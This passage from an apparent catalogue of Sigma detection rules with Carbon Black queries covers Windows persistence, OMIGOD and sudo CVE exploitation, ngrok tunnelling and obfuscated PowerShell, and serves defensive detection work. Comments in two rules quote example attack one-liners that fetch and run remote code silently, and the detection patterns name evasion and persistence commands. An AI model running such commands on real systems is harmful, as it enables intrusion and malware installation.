            - 'C:\WINDOWS\system32\advpack.dll,DelNodeRunDLL32'
        Details|contains:
            - '\AppData\Local\Temp\'
            - 'C:\Windows\Temp\'
    filter_optional_spotify:
        Image|endswith:
            - 'C:\Program Files\Spotify\Spotify.exe'
            - 'C:\Program Files (x86)\Spotify\Spotify.exe'
            - '\AppData\Roaming\Spotify\Spotify.exe'
        TargetObject|endswith: 'SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Spotify'
        Details|endswith: 'Spotify.exe --autostart --minimized'
    condition: selection_target and (selection_suspicious_paths_1 or (all of selection_suspicious_paths_user_* )) and not 1 of filter_main_* and not 1 of filter_optional_*
falsepositives:
    - Software using weird folders for updates
level: high
Convert to SIEM query
high Moderate Medium FP
New TimeProviders Registered With Uncommon DLL Name
Detects processes setting a new DLL in DllName in under HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\W32Time\TimeProvider. Adversaries may abuse time providers to execute DLLs when the system boots. The Windows Time service (W32Time) enables time synchronization across and within domains.
status test author frack113 ATT&CK sub-technique id e88a6ddc-74f7-463b-9b26-f69fc0d2ce85
carbon_black query
(TargetObject:\\Services\\W32Time\\TimeProviders* TargetObject:\\DllName) (-(Details:%SystemRoot%\\System32\\vmictimeprovider.dll OR Details:%systemroot%\\system32\\w32time.dll OR Details:C\:\\Windows\\SYSTEM32\\w32time.DLL))
view Sigma YAML
title: New TimeProviders Registered With Uncommon DLL Name
id: e88a6ddc-74f7-463b-9b26-f69fc0d2ce85
status: test
description: |
    Detects processes setting a new DLL in DllName in under HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\W32Time\TimeProvider.
    Adversaries may abuse time providers to execute DLLs when the system boots.
    The Windows Time service (W32Time) enables time synchronization across and within domains.
references:
    - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1547.003/T1547.003.md
author: frack113
date: 2022-06-19
modified: 2024-03-26
tags:
    - attack.persistence
    - attack.privilege-escalation
    - attack.t1547.003
logsource:
    category: registry_set
    product: windows
detection:
    selection:
        TargetObject|contains: '\Services\W32Time\TimeProviders'
        TargetObject|endswith: '\DllName'
    filter_main_w32time:
        Details:
            - '%SystemRoot%\System32\vmictimeprovider.dll'
            - '%systemroot%\system32\w32time.dll'
            - 'C:\Windows\SYSTEM32\w32time.DLL'
    condition: selection and not 1 of filter_main_*
falsepositives:
    - Unknown
level: high
Convert to SIEM query
high Moderate High FP
New User Created Via Net.EXE With Never Expire Option
Detects creation of local users via the net.exe command with the option "never expire"
status test author Nasreddine Bencherchali (Nextron Systems) ATT&CK sub-technique id b9f0e6f5-09b4-4358-bae4-08408705bd5c
carbon_black query
((Image:\\net.exe OR Image:\\net1.exe) OR (OriginalFileName:net.exe OR OriginalFileName:net1.exe)) (CommandLine:user* CommandLine:add* CommandLine:expires\:never*)
view Sigma YAML
title: New User Created Via Net.EXE With Never Expire Option
id: b9f0e6f5-09b4-4358-bae4-08408705bd5c
related:
    - id: cd219ff3-fa99-45d4-8380-a7d15116c6dc
      type: derived
status: test
description: Detects creation of local users via the net.exe command with the option "never expire"
references:
    - https://thedfirreport.com/2022/07/11/select-xmrig-from-sqlserver/
author: Nasreddine Bencherchali (Nextron Systems)
date: 2022-07-12
modified: 2023-02-21
tags:
    - attack.persistence
    - attack.t1136.001
logsource:
    category: process_creation
    product: windows
detection:
    selection_img:
        - Image|endswith:
              - '\net.exe'
              - '\net1.exe'
        - OriginalFileName:
              - 'net.exe'
              - 'net1.exe'
    selection_cli:
        CommandLine|contains|all:
            - 'user'
            - 'add'
            - 'expires:never'
    condition: all of selection_*
falsepositives:
    - Unlikely
level: high
Convert to SIEM query
high Moderate Medium FP
Nginx Core Dump
Detects a core dump of a crashing Nginx worker process, which could be a signal of a serious problem or exploitation attempts.
status test author Florian Roth (Nextron Systems) ATT&CK sub-technique id 59ec40bb-322e-40ab-808d-84fa690d7e56
carbon_black query
"exited\ on\ signal\ 6\ \(core\ dumped\)"
view Sigma YAML
title: Nginx Core Dump
id: 59ec40bb-322e-40ab-808d-84fa690d7e56
status: test
description: Detects a core dump of a crashing Nginx worker process, which could be a signal of a serious problem or exploitation attempts.
references:
    - https://docs.nginx.com/nginx/admin-guide/monitoring/debugging/#enabling-core-dumps
    - https://www.x41-dsec.de/lab/advisories/x41-2021-002-nginx-resolver-copy/
author: Florian Roth (Nextron Systems)
date: 2021-05-31
modified: 2023-05-08
tags:
    - attack.impact
    - attack.t1499.004
logsource:
    service: nginx
detection:
    keywords:
        - 'exited on signal 6 (core dumped)'
    condition: keywords
falsepositives:
    - Serious issues with a configuration or plugin
level: high
Convert to SIEM query
high Moderate Medium FP
Ngrok Usage with Remote Desktop Service
Detects cases in which ngrok, a reverse proxy tool, forwards events to the local RDP port, which could be a sign of malicious behaviour
status test author Florian Roth (Nextron Systems) ATT&CK technique id 64d51a51-32a6-49f0-9f3d-17e34d640272
carbon_black query
EventID:21 Address:16777216*
view Sigma YAML
title: Ngrok Usage with Remote Desktop Service
id: 64d51a51-32a6-49f0-9f3d-17e34d640272
status: test
description: Detects cases in which ngrok, a reverse proxy tool, forwards events to the local RDP port, which could be a sign of malicious behaviour
references:
    - https://twitter.com/tekdefense/status/1519711183162556416?s=12&t=OTsHCBkQOTNs1k3USz65Zg
    - https://ngrok.com/
author: Florian Roth (Nextron Systems)
date: 2022-04-29
tags:
    - attack.command-and-control
    - attack.t1090
logsource:
    product: windows
    service: terminalservices-localsessionmanager
detection:
    selection:
        EventID: 21
        Address|contains: '16777216'
    condition: selection
falsepositives:
    - Unknown
level: high
Convert to SIEM query
high Moderate Medium FP
Non-Standard Nsswitch.Conf Creation - Potential CVE-2025-32463 Exploitation
Detects the creation of nsswitch.conf files in non-standard directories, which may indicate exploitation of CVE-2025-32463. This vulnerability requires an attacker to create a nsswitch.conf in a directory that will be used during sudo chroot operations. When sudo executes, it loads malicious shared libraries from user-controlled locations within the chroot environment, potentially leading to arbitrary code execution and privilege escalation.
status experimental author Swachchhanda Shrawn Poudel (Nextron Systems) ATT&CK technique id 10ac0730-c24e-4f4c-81f8-b13a1ac95a1d
carbon_black query
TargetFilename:\/etc\/nsswitch.conf (-(TargetFilename:\/etc\/nsswitch.conf OR TargetFilename:\/usr\/share\/factory\/etc\/nsswitch.conf))
view Sigma YAML
title: Non-Standard Nsswitch.Conf Creation - Potential CVE-2025-32463 Exploitation
id: 10ac0730-c24e-4f4c-81f8-b13a1ac95a1d
status: experimental
description: |
    Detects the creation of nsswitch.conf files in non-standard directories, which may indicate exploitation of CVE-2025-32463.
    This vulnerability requires an attacker to create a nsswitch.conf in a directory that will be used during sudo chroot operations.
    When sudo executes, it loads malicious shared libraries from user-controlled locations within the chroot environment,
    potentially leading to arbitrary code execution and privilege escalation.
references:
    - https://github.com/kh4sh3i/CVE-2025-32463/blob/81bb430f84fa2089224733c3ed4bfa434c197ad4/exploit.sh
author: Swachchhanda Shrawn Poudel (Nextron Systems)
date: 2025-10-02
modified: 2026-03-31
tags:
    - attack.privilege-escalation
    - attack.t1068
    - cve.2025-32463
    - detection.emerging-threats
logsource:
    category: file_event
    product: linux
detection:
    selection:
        TargetFilename|endswith: '/etc/nsswitch.conf'
    filter_main_legitimate_path:
        TargetFilename:
            - '/etc/nsswitch.conf'
            - '/usr/share/factory/etc/nsswitch.conf'
    condition: selection and not 1 of filter_main_*
falsepositives:
    - Backup locations
level: high
Convert to SIEM query
high Moderate Medium FP
Non-privileged Usage of Reg or Powershell
Search for usage of reg or Powershell by non-privileged users to modify service configuration in registry
status test author Teymur Kheirkhabarov (idea), Ryan Plas (rule), oscd.community ATT&CK technique id 8f02c935-effe-45b3-8fc9-ef8696a9e41d
carbon_black query
((CommandLine:reg\ * CommandLine:add*) OR (CommandLine:powershell* OR CommandLine:set\-itemproperty* OR CommandLine:\ sp\ * OR CommandLine:new\-itemproperty*)) ((IntegrityLevel:Medium OR IntegrityLevel:S\-1\-16\-8192) (CommandLine:ControlSet* CommandLine:Services*) (CommandLine:ImagePath* OR CommandLine:FailureCommand* OR CommandLine:ServiceDLL*))
view Sigma YAML
title: Non-privileged Usage of Reg or Powershell
id: 8f02c935-effe-45b3-8fc9-ef8696a9e41d
status: test
description: Search for usage of reg or Powershell by non-privileged users to modify service configuration in registry
references:
    - https://image.slidesharecdn.com/kheirkhabarovoffzonefinal-181117201458/95/hunting-for-privilege-escalation-in-windows-environment-20-638.jpg
author: Teymur Kheirkhabarov (idea), Ryan Plas (rule), oscd.community
date: 2020-10-05
modified: 2024-12-01
tags:
    - attack.persistence
    - attack.defense-impairment
    - attack.t1112
logsource:
    category: process_creation
    product: windows
detection:
    selection_cli:
        - CommandLine|contains|all:
              - 'reg '
              - 'add'
        - CommandLine|contains:
              - 'powershell'
              - 'set-itemproperty'
              - ' sp '
              - 'new-itemproperty'
    selection_data:
        IntegrityLevel:
            - 'Medium'
            - 'S-1-16-8192'
        CommandLine|contains|all:
            - 'ControlSet'
            - 'Services'
        CommandLine|contains:
            - 'ImagePath'
            - 'FailureCommand'
            - 'ServiceDLL'
    condition: all of selection_*
falsepositives:
    - Unknown
level: high
Convert to SIEM query
high Moderate High FP
NtdllPipe Like Activity Execution
Detects command that type the content of ntdll.dll to a different file or a pipe in order to evade AV / EDR detection. As seen being used in the POC NtdllPipe
status test author Florian Roth (Nextron Systems) ATT&CK tactic-only id bbc865e4-7fcd-45a6-8ff1-95ced28ec5b2
carbon_black query
CommandLine:type\ %windir%\\system32\\ntdll.dll* OR CommandLine:type\ %systemroot%\\system32\\ntdll.dll* OR CommandLine:type\ c\:\\windows\\system32\\ntdll.dll* OR CommandLine:\\ntdll.dll\ >\ \\\\.\\pipe\\*
view Sigma YAML
title: NtdllPipe Like Activity Execution
id: bbc865e4-7fcd-45a6-8ff1-95ced28ec5b2
status: test
description: Detects command that type the content of ntdll.dll to a different file or a pipe in order to evade AV / EDR detection. As seen being used in the POC NtdllPipe
references:
    - https://web.archive.org/web/20220306121156/https://www.x86matthew.com/view_post?id=ntdll_pipe
author: Florian Roth (Nextron Systems)
date: 2022-03-05
modified: 2023-03-07
tags:
    - attack.defense-impairment
logsource:
    category: process_creation
    product: windows
detection:
    selection:
        CommandLine|contains:
            - 'type %windir%\system32\ntdll.dll'
            - 'type %systemroot%\system32\ntdll.dll'
            - 'type c:\windows\system32\ntdll.dll'
            - '\\ntdll.dll > \\\\.\\pipe\\'
    condition: selection
falsepositives:
    - Unknown
level: high
Convert to SIEM query
high Strong Low FP
OMIGOD HTTP No Authentication RCE - CVE-2021-38647
Detects the exploitation of OMIGOD (CVE-2021-38647) which allows remote execute (RCE) commands as root with just a single unauthenticated HTTP request. Verify, successful, exploitation by viewing the HTTP client (request) body to see what was passed to the server (using PCAP). Within the client body is where the code execution would occur. Additionally, check the endpoint logs to see if suspicious commands or activity occurred within the timeframe of this HTTP request.
status stable author Nate Guagenti (neu5ron) ATT&CK sub-technique id ab6b1a39-a9ee-4ab4-b075-e83acf6e346b
carbon_black query
(status_code:200 uri:\/wsman method:POST) (-client_header_names:AUTHORIZATION*) (-request_body_len:0)
view Sigma YAML
title: OMIGOD HTTP No Authentication RCE - CVE-2021-38647
id: ab6b1a39-a9ee-4ab4-b075-e83acf6e346b
status: stable
description: |
    Detects the exploitation of OMIGOD (CVE-2021-38647) which allows remote execute (RCE) commands as root with just a single unauthenticated HTTP request.
    Verify, successful, exploitation by viewing the HTTP client (request) body to see what was passed to the server (using PCAP).
    Within the client body is where the code execution would occur. Additionally, check the endpoint logs to see if suspicious commands or activity occurred within the timeframe of this HTTP request.
references:
    - https://www.wiz.io/blog/omigod-critical-vulnerabilities-in-omi-azure
    - https://twitter.com/neu5ron/status/1438987292971053057?s=20
author: Nate Guagenti (neu5ron)
date: 2021-09-20
modified: 2025-11-03
tags:
    - attack.privilege-escalation
    - attack.initial-access
    - attack.execution
    - attack.lateral-movement
    - attack.t1068
    - attack.t1190
    - attack.t1203
    - attack.t1021.006
    - attack.t1210
    - detection.emerging-threats
    - cve.2021-38647
logsource:
    product: zeek
    service: http
    definition: Enable the builtin Zeek script that logs all HTTP header names by adding "@load policy/protocols/http/header-names" to your local.zeek config file. The script can be seen here for reference https://github.com/zeek/zeek/blob/d957f883df242ef159cfd846884e673addeea7a5/scripts/policy/protocols/http/header-names.zeek
detection:
    selection:
        status_code: 200
        uri: /wsman
        method: POST
    auth_header:
        client_header_names|contains: 'AUTHORIZATION'
    too_small_http_client_body:
        request_body_len: 0
    # winrm_ports:
    #    id.resp_p:
    #        -  5985
    #        -  5986
    #        -  1270
    condition: selection and not auth_header and not too_small_http_client_body
    # condition: selection and winrm_ports and not auth_header and not too_small_http_client_body # Enable this to only perform search on default WinRM ports, however those ports are sometimes changed and therefore this is disabled by default to give a broader coverage of this rule
falsepositives:
    - Exploits that were attempted but unsuccessful.
    - Scanning attempts with the abnormal use of the HTTP POST method with no indication of code execution within the HTTP Client (Request) body. An example would be vulnerability scanners trying to identify unpatched versions while not actually exploiting the vulnerability. See description for investigation tips.
level: high
Convert to SIEM query
high Strong Medium FP
OMIGOD SCX RunAsProvider ExecuteScript
Rule to detect the use of the SCX RunAsProvider ExecuteScript to execute any UNIX/Linux script using the /bin/sh shell. Script being executed gets created as a temp file in /tmp folder with a scx* prefix. Then it is invoked from the following directory /etc/opt/microsoft/scx/conf/tmpdir/. The file in that directory has the same prefix scx*. SCXcore, started as the Microsoft Operations Manager UNIX/Linux Agent, is now used in a host of products including Microsoft Operations Manager, Microsoft Azure, and Microsoft Operations Management Suite.
status test author Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research), MSTIC ATT&CK technique id 6eea1bf6-f8d2-488a-a742-e6ef6c1b67db
carbon_black query
User:root LogonId:0 CurrentDirectory:\/var\/opt\/microsoft\/scx\/tmp CommandLine:\/etc\/opt\/microsoft\/scx\/conf\/tmpdir\/scx*
view Sigma YAML
title: OMIGOD SCX RunAsProvider ExecuteScript
id: 6eea1bf6-f8d2-488a-a742-e6ef6c1b67db
status: test
description: |
    Rule to detect the use of the SCX RunAsProvider ExecuteScript to execute any UNIX/Linux script using the /bin/sh shell.
    Script being executed gets created as a temp file in /tmp folder with a scx* prefix.
    Then it is invoked from the following directory /etc/opt/microsoft/scx/conf/tmpdir/.
    The file in that directory has the same prefix scx*. SCXcore, started as the Microsoft Operations Manager UNIX/Linux Agent, is now used in a host of products including
    Microsoft Operations Manager, Microsoft Azure, and Microsoft Operations Management Suite.
references:
    - https://www.wiz.io/blog/omigod-critical-vulnerabilities-in-omi-azure
    - https://github.com/Azure/Azure-Sentinel/pull/3059
author: Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research), MSTIC
date: 2021-10-15
modified: 2022-10-05
tags:
    - attack.privilege-escalation
    - attack.initial-access
    - attack.execution
    - attack.t1068
    - attack.t1190
    - attack.t1203
logsource:
    product: linux
    category: process_creation
detection:
    selection:
        User: root
        LogonId: 0
        CurrentDirectory: '/var/opt/microsoft/scx/tmp'
        CommandLine|contains: '/etc/opt/microsoft/scx/conf/tmpdir/scx'
    condition: selection
falsepositives:
    - Legitimate use of SCX RunAsProvider ExecuteScript.
level: high
Convert to SIEM query
high Strong Medium FP
OMIGOD SCX RunAsProvider ExecuteShellCommand
Rule to detect the use of the SCX RunAsProvider Invoke_ExecuteShellCommand to execute any UNIX/Linux command using the /bin/sh shell. SCXcore, started as the Microsoft Operations Manager UNIX/Linux Agent, is now used in a host of products including Microsoft Operations Manager, Microsoft Azure, and Microsoft Operations Management Suite.
status test author Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research), MSTIC ATT&CK technique id 21541900-27a9-4454-9c4c-3f0a4240344a
carbon_black query
User:root LogonId:0 CurrentDirectory:\/var\/opt\/microsoft\/scx\/tmp CommandLine:\/bin\/sh*
view Sigma YAML
title: OMIGOD SCX RunAsProvider ExecuteShellCommand
id: 21541900-27a9-4454-9c4c-3f0a4240344a
status: test
description: |
    Rule to detect the use of the SCX RunAsProvider Invoke_ExecuteShellCommand to execute any UNIX/Linux command using the /bin/sh shell.
    SCXcore, started as the Microsoft Operations Manager UNIX/Linux Agent, is now used in a host of products including
    Microsoft Operations Manager, Microsoft Azure, and Microsoft Operations Management Suite.
references:
    - https://www.wiz.io/blog/omigod-critical-vulnerabilities-in-omi-azure
    - https://github.com/Azure/Azure-Sentinel/pull/3059
author: Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research), MSTIC
date: 2021-10-15
modified: 2022-10-05
tags:
    - attack.privilege-escalation
    - attack.initial-access
    - attack.execution
    - attack.t1068
    - attack.t1190
    - attack.t1203
logsource:
    product: linux
    category: process_creation
detection:
    selection:
        User: root
        LogonId: 0
        CurrentDirectory: '/var/opt/microsoft/scx/tmp'
        CommandLine|contains: '/bin/sh'
    condition: selection
falsepositives:
    - Legitimate use of SCX RunAsProvider Invoke_ExecuteShellCommand.
level: high
Convert to SIEM query
high Moderate High FP
OSACompile Run-Only Execution
Detects potential suspicious run-only executions compiled using OSACompile
status test author Sohan G (D4rkCiph3r) ATT&CK sub-technique id b9d9b652-d8ed-4697-89a2-a1186ee680ac
carbon_black query
CommandLine:osacompile* CommandLine:\ \-x\ * CommandLine:\ \-e\ *
view Sigma YAML
title: OSACompile Run-Only Execution
id: b9d9b652-d8ed-4697-89a2-a1186ee680ac
status: test
description: Detects potential suspicious run-only executions compiled using OSACompile
references:
    - https://redcanary.com/blog/applescript/
    - https://ss64.com/osx/osacompile.html
author: Sohan G (D4rkCiph3r)
date: 2023-01-31
tags:
    - attack.t1059.002
    - attack.execution
logsource:
    product: macos
    category: process_creation
detection:
    selection:
        CommandLine|contains|all:
            - 'osacompile'
            - ' -x '
            - ' -e '
    condition: selection
falsepositives:
    - Unknown
level: high
Convert to SIEM query
high Moderate High FP
Obfuscated PowerShell MSI Install via WindowsInstaller COM
Detects the execution of obfuscated PowerShell commands that attempt to install MSI packages via the Windows Installer COM object (`WindowsInstaller.Installer`). The technique involves manipulating strings to hide functionality, such as constructing class names using string insertion (e.g., 'indowsInstaller.Installer'.Insert(0,'W')) and correcting malformed URLs (e.g., converting 'htps://' to 'https://') at runtime. This behavior is commonly associated with malware loaders or droppers that aim to bypass static detection by hiding intent in runtime-generated strings and using legitimate tools for code execution. The use of `InstallProduct` and COM object creation, particularly combined with hidden window execution and suppressed UI, indicates an attempt to install software (likely malicious) without user interaction.
status experimental author Meroujan Antonyan (vx3r) ATT&CK sub-technique id 7b6a7418-3afc-11f0-aff4-000d3abf478c
carbon_black query
((Image:\\powershell_ise.exe OR Image:\\powershell.exe OR Image:\\pwsh.exe) OR (OriginalFileName:PowerShell_ISE.EXE OR OriginalFileName:PowerShell.EXE OR OriginalFileName:pwsh.dll)) (CommandLine:\-ComObject* CommandLine:InstallProduct\(* CommandLine:.Insert\(* CommandLine:UILevel*)
view Sigma YAML
title: Obfuscated PowerShell MSI Install via WindowsInstaller COM
id: 7b6a7418-3afc-11f0-aff4-000d3abf478c
status: experimental
description: |
    Detects the execution of obfuscated PowerShell commands that attempt to install MSI packages via the Windows Installer COM object (`WindowsInstaller.Installer`).
    The technique involves manipulating strings to hide functionality, such as constructing class names using string insertion (e.g., 'indowsInstaller.Installer'.Insert(0,'W')) and correcting
    malformed URLs (e.g., converting 'htps://' to 'https://') at runtime. This behavior is commonly associated with malware loaders or droppers that aim to bypass static detection
    by hiding intent in runtime-generated strings and using legitimate tools for code execution. The use of `InstallProduct` and COM object creation, particularly combined with
    hidden window execution and suppressed UI, indicates an attempt to install software (likely malicious) without user interaction.
references:
    - https://informationsecuritybuzz.com/the-real-danger-behind-a-simple-windows-shortcut/
    - https://redcanary.com/blog/threat-intelligence/intelligence-insights-may-2025/
    - https://www.virustotal.com/gui/file/f9710b0ba4de5fa0e7ec27da462d4d2fc6838eba83a19f23f6617a466bbad457
author: Meroujan Antonyan (vx3r)
date: 2025-05-27
tags:
    - attack.stealth
    - attack.t1027.010
    - attack.t1218.007
    - attack.execution
    - attack.t1059.001
logsource:
    category: process_creation
    product: windows
detection:
    # Example: "C:\Windows\system32\WindowsPowerShell\v1.0\PowerShell.exe" -W Hidden -C "$u='htps://example.com/';$i=New-Object -ComObject('indowsInstaller.Installer'.Insert(0,'W'));$i.UILevel=2;$i.InstallProduct($(if($u.StartsWith('htps://')){$u.Insert(2,'t')}else{$u}),'')";
    selection_img:
        - Image|endswith:
              - '\powershell_ise.exe'
              - '\powershell.exe'
              - '\pwsh.exe'
        - OriginalFileName:
              - 'PowerShell_ISE.EXE'
              - 'PowerShell.EXE'
              - 'pwsh.dll'
    selection_cli:
        CommandLine|contains|all:
            - '-ComObject'
            - 'InstallProduct('
            - '.Insert('
            - 'UILevel'
    condition: all of selection_*
falsepositives:
    - Unknown
level: high
Convert to SIEM query
high Moderate High FP
Obfuscated PowerShell OneLiner Execution
Detects the execution of a specific OneLiner to download and execute powershell modules in memory.
status test author @Kostastsale, TheDFIRReport ATT&CK sub-technique id 44e24481-6202-4c62-9127-5a0ae8e3fe3d
carbon_black query
Image:\\powershell.exe (CommandLine:http\:\/\/127.0.0.1* CommandLine:%\{\(IRM\ $_\)\}* CommandLine:Invoke*)
view Sigma YAML
title: Obfuscated PowerShell OneLiner Execution
id: 44e24481-6202-4c62-9127-5a0ae8e3fe3d
status: test
description: Detects the execution of a specific OneLiner to download and execute powershell modules in memory.
references:
    - https://thedfirreport.com/2022/05/09/seo-poisoning-a-gootloader-story/
    - https://gist.github.com/mgeeky/3b11169ab77a7de354f4111aa2f0df38
author: '@Kostastsale, TheDFIRReport'
date: 2022-05-09
modified: 2025-04-16
tags:
    - attack.execution
    - attack.defense-impairment
    - attack.t1059.001
    - attack.t1685
logsource:
    product: windows
    category: process_creation
detection:
    selection:
        # Example: powershell -nop -noni -ep bypass -w h -c "$u=("http://127.0.0.1:1337/"|%%{(IRM $_)});&("".SubString.ToString()[67,72,64]-Join"")($u); Import-Module C:\Users\EXAMPLE\Invoke-WMIExec.ps1; Invoke-WMIExec"
        Image|endswith: '\powershell.exe'
        CommandLine|contains|all:
            - 'http://127.0.0.1'
            - '%{(IRM $_)}'
            - 'Invoke'
    condition: selection
falsepositives:
    - Unknown
level: high
Convert to SIEM query
high Moderate High FP
Octopus Scanner Malware
Detects Octopus Scanner Malware.
status test author NVISO ATT&CK sub-technique id 805c55d9-31e6-4846-9878-c34c75054fe9
carbon_black query
TargetFilename:\\AppData\\Local\\Microsoft\\Cache134.dat OR TargetFilename:\\AppData\\Local\\Microsoft\\ExplorerSync.db
view Sigma YAML
title: Octopus Scanner Malware
id: 805c55d9-31e6-4846-9878-c34c75054fe9
status: test
description: Detects Octopus Scanner Malware.
references:
    - https://securitylab.github.com/research/octopus-scanner-malware-open-source-supply-chain
author: NVISO
date: 2020-06-09
modified: 2021-11-27
tags:
    - attack.initial-access
    - attack.t1195
    - attack.t1195.001
logsource:
    product: windows
    category: file_event
detection:
    selection:
        TargetFilename|endswith:
            - '\AppData\Local\Microsoft\Cache134.dat'
            - '\AppData\Local\Microsoft\ExplorerSync.db'
    condition: selection
falsepositives:
    - Unknown
level: high
Convert to SIEM query
high Moderate High FP
Odbcconf.EXE Suspicious DLL Location
Detects execution of "odbcconf" where the path of the DLL being registered is located in a potentially suspicious location.
status test author Nasreddine Bencherchali (Nextron Systems) ATT&CK sub-technique id 6b65c28e-11f3-46cb-902a-68f2cafaf474
carbon_black query
(Image:\\odbcconf.exe OR OriginalFileName:odbcconf.exe) (CommandLine:\:\\PerfLogs\\* OR CommandLine:\:\\ProgramData\\* OR CommandLine:\:\\Temp\\* OR CommandLine:\:\\Users\\Public\\* OR CommandLine:\:\\Windows\\Registration\\CRMLog* OR CommandLine:\:\\Windows\\System32\\com\\dmp\\* OR CommandLine:\:\\Windows\\System32\\FxsTmp\\* OR CommandLine:\:\\Windows\\System32\\Microsoft\\Crypto\\RSA\\MachineKeys\\* OR CommandLine:\:\\Windows\\System32\\spool\\drivers\\color\\* OR CommandLine:\:\\Windows\\System32\\spool\\PRINTERS\\* OR CommandLine:\:\\Windows\\System32\\spool\\SERVERS\\* OR CommandLine:\:\\Windows\\System32\\Tasks_Migrated\\* OR CommandLine:\:\\Windows\\System32\\Tasks\\Microsoft\\Windows\\SyncCenter\\* OR CommandLine:\:\\Windows\\SysWOW64\\com\\dmp\\* OR CommandLine:\:\\Windows\\SysWOW64\\FxsTmp\\* OR CommandLine:\:\\Windows\\SysWOW64\\Tasks\\Microsoft\\Windows\\PLA\\System\\* OR CommandLine:\:\\Windows\\SysWOW64\\Tasks\\Microsoft\\Windows\\SyncCenter\\* OR CommandLine:\:\\Windows\\Tasks\\* OR CommandLine:\:\\Windows\\Temp\\* OR CommandLine:\:\\Windows\\Tracing\\* OR CommandLine:\\AppData\\Local\\Temp\\* OR CommandLine:\\AppData\\Roaming\\*)
view Sigma YAML
title: Odbcconf.EXE Suspicious DLL Location
id: 6b65c28e-11f3-46cb-902a-68f2cafaf474
status: test
description: Detects execution of "odbcconf" where the path of the DLL being registered is located in a potentially suspicious location.
references:
    - https://learn.microsoft.com/en-us/sql/odbc/odbcconf-exe?view=sql-server-ver16
    - https://www.trendmicro.com/en_us/research/17/h/backdoor-carrying-emails-set-sights-on-russian-speaking-businesses.html
    - https://securityintelligence.com/posts/raspberry-robin-worm-dridex-malware/
author: Nasreddine Bencherchali (Nextron Systems)
date: 2023-05-22
modified: 2023-05-26
tags:
    - attack.stealth
    - attack.t1218.008
logsource:
    category: process_creation
    product: windows
detection:
    selection_img:
        - Image|endswith: '\odbcconf.exe'
        - OriginalFileName: 'odbcconf.exe'
    selection_cli:
        # Note: Add more suspicious locations
        CommandLine|contains:
            - ':\PerfLogs\'
            - ':\ProgramData\'
            - ':\Temp\'
            - ':\Users\Public\'
            - ':\Windows\Registration\CRMLog'
            - ':\Windows\System32\com\dmp\'
            - ':\Windows\System32\FxsTmp\'
            - ':\Windows\System32\Microsoft\Crypto\RSA\MachineKeys\'
            - ':\Windows\System32\spool\drivers\color\'
            - ':\Windows\System32\spool\PRINTERS\'
            - ':\Windows\System32\spool\SERVERS\'
            - ':\Windows\System32\Tasks_Migrated\'
            - ':\Windows\System32\Tasks\Microsoft\Windows\SyncCenter\'
            - ':\Windows\SysWOW64\com\dmp\'
            - ':\Windows\SysWOW64\FxsTmp\'
            - ':\Windows\SysWOW64\Tasks\Microsoft\Windows\PLA\System\'
            - ':\Windows\SysWOW64\Tasks\Microsoft\Windows\SyncCenter\'
            - ':\Windows\Tasks\'
            - ':\Windows\Temp\'
            - ':\Windows\Tracing\'
            - '\AppData\Local\Temp\'
            - '\AppData\Roaming\'
    condition: all of selection_*
falsepositives:
    - Unlikely
level: high
Convert to SIEM query
high Moderate High FP
Office Macro File Creation From Suspicious Process
Detects the creation of a office macro file from a a suspicious process
status test author frack113, Nasreddine Bencherchali (Nextron Systems) ATT&CK sub-technique id b1c50487-1967-4315-a026-6491686d860e
carbon_black query
((Image:\\cscript.exe OR Image:\\mshta.exe OR Image:\\regsvr32.exe OR Image:\\rundll32.exe OR Image:\\wscript.exe) OR (ParentImage:\\cscript.exe OR ParentImage:\\mshta.exe OR ParentImage:\\regsvr32.exe OR ParentImage:\\rundll32.exe OR ParentImage:\\wscript.exe)) (TargetFilename:.docm OR TargetFilename:.dotm OR TargetFilename:.xlsm OR TargetFilename:.xltm OR TargetFilename:.potm OR TargetFilename:.pptm)
view Sigma YAML
title: Office Macro File Creation From Suspicious Process
id: b1c50487-1967-4315-a026-6491686d860e
status: test
description: Detects the creation of a office macro file from a a suspicious process
references:
    - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1566.001/T1566.001.md
    - https://learn.microsoft.com/en-us/deployoffice/compat/office-file-format-reference
author: frack113, Nasreddine Bencherchali (Nextron Systems)
date: 2022-01-23
modified: 2023-02-22
tags:
    - attack.initial-access
    - attack.t1566.001
logsource:
    category: file_event
    product: windows
    definition: 'Requirements: The "ParentImage" field is not available by default on EID 11 of Sysmon logs. To be able to use this rule to the full extent you need to enriche the log with additional ParentImage data'
detection:
    selection_cmd:
        - Image|endswith:
              - '\cscript.exe'
              - '\mshta.exe'
              - '\regsvr32.exe'
              - '\rundll32.exe'
              - '\wscript.exe'
        # Note: ParentImage is a custom field and is not available by default on Sysmon EID 11
        - ParentImage|endswith:
              - '\cscript.exe'
              - '\mshta.exe'
              - '\regsvr32.exe'
              - '\rundll32.exe'
              - '\wscript.exe'
    selection_ext:
        TargetFilename|endswith:
            - '.docm'
            - '.dotm'
            - '.xlsm'
            - '.xltm'
            - '.potm'
            - '.pptm'
    condition: all of selection_*
falsepositives:
    - Unknown
level: high
Convert to SIEM query
high Moderate Medium FP
Office Macros Warning Disabled
Detects registry changes to Microsoft Office "VBAWarning" to a value of "1" which enables the execution of all macros, whether signed or unsigned.
status test author Trent Liffick (@tliffick), Nasreddine Bencherchali (Nextron Systems) ATT&CK technique id 91239011-fe3c-4b54-9f24-15c86bb65913
carbon_black query
TargetObject:\\Security\\VBAWarnings Details:DWORD\ \(0x00000001\)
view Sigma YAML
title: Office Macros Warning Disabled
id: 91239011-fe3c-4b54-9f24-15c86bb65913
related:
    - id: 9b894e57-033f-46cf-b7fa-a52804181973
      type: obsolete
status: test
description: Detects registry changes to Microsoft Office "VBAWarning" to a value of "1" which enables the execution of all macros, whether signed or unsigned.
references:
    - https://twitter.com/inversecos/status/1494174785621819397
    - https://www.mcafee.com/blogs/other-blogs/mcafee-labs/zloader-with-a-new-infection-technique/
    - https://securelist.com/scarcruft-surveilling-north-korean-defectors-and-human-rights-activists/105074/
